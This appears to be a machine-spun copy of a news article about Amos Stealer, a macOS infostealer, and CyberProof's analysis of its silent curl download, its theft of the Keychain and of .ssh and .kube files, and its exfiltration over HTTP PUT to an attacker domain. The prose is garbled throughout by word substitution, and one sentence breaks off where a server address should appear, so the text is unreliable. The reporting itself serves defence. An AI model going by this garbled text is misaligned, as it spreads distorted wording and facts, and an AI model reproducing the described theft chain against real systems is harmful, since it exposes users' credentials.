Amos Stealer, an information-stealing malware, is concentrating on Apple Mac computer systems to steal non-public knowledge, based on new particulars from cybersecurity analysis agency CyberProof. Menace actors are, reportedly, actively utilizing this malware household to run financially motivated campaigns by compromising macOS environments.
Though Amos Stealer is just not new, within the newest marketing campaign, the risk actors are distributing the infostealer by way of misleading software program downloads, pretend web sites, and social engineering lures.
As soon as inside a Mac, it searches for worthwhile recordsdata throughout system directories. It then collects saved passwords, session cookies, and autofill type info from Google Chrome and Microsoft Edge browsers.
Silent Obtain Strategies
Researchers famous that the malware operators use a built-in macOS utility known as curl to obtain the malicious recordsdata silently. Throughout a latest incident investigation, a risk searching question flagged an uncommon curl command.
They famous that, whereas figuring out the precise server tackle that cybercriminals have been utilizing to fetch the malicious script, as:
Additional probing revealed that the hackers used particular command flags -fsSL to make the obtain fully invisible to the person. These flags cease error alerts, flip off obtain progress bars, and make sure the script runs quietly. As soon as the script is downloaded, it robotically launches an AppleScript command utilizing the zsh terminal shell to start amassing knowledge.
“Amos Stealer stays a outstanding and extremely energetic malware household particularly engineered to focus on macOS customers and extract delicate info from compromised techniques,” researchers defined within the weblog put up shared with Hackread.com.
Information Stealing and Cleanup
Investigation additionally revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db, to entry saved company login particulars. It additionally searches the person’s residence path for confidential developer configuration recordsdata and keys, together with .kube, .ssh, .zshrc, and .gitconfig.
To arrange the info for the hackers, the malware makes use of a local macOS instrument known as ditto to compress the stolen recordsdata right into a single archive named osalogging.zip contained in the /tmp folder. This file is split into 10 MB chunks by the script, and a singular session ID is generated for the add by mixing the present timestamp with a random hexadecimal string from OpenSSL.
Amos Stealer then sends the info to the attacker-controlled server tackle (bestbuydomain.com) utilizing an HTTP PUT request by way of curl. A notable side is that the system retries failed uploads as much as eight instances. After a profitable add, Amos Stealer runs the cleanup instructions (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its presence.
This silent kind of cyberattack permits risk actors to simply steal saved credentials, which may go away compromised company networks uncovered to knowledge breaches and monetary theft. CyberProof recommends that corporations implement strict Gatekeeper insurance policies and monitor endpoints for unusual curl instructions to dam these risk actors.
![How creators and entrepreneurs are utilizing AI to hurry up & succeed [data]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/Untitled20design-Apr-07-2023-08-24-35-4586-PM-120x86.png)
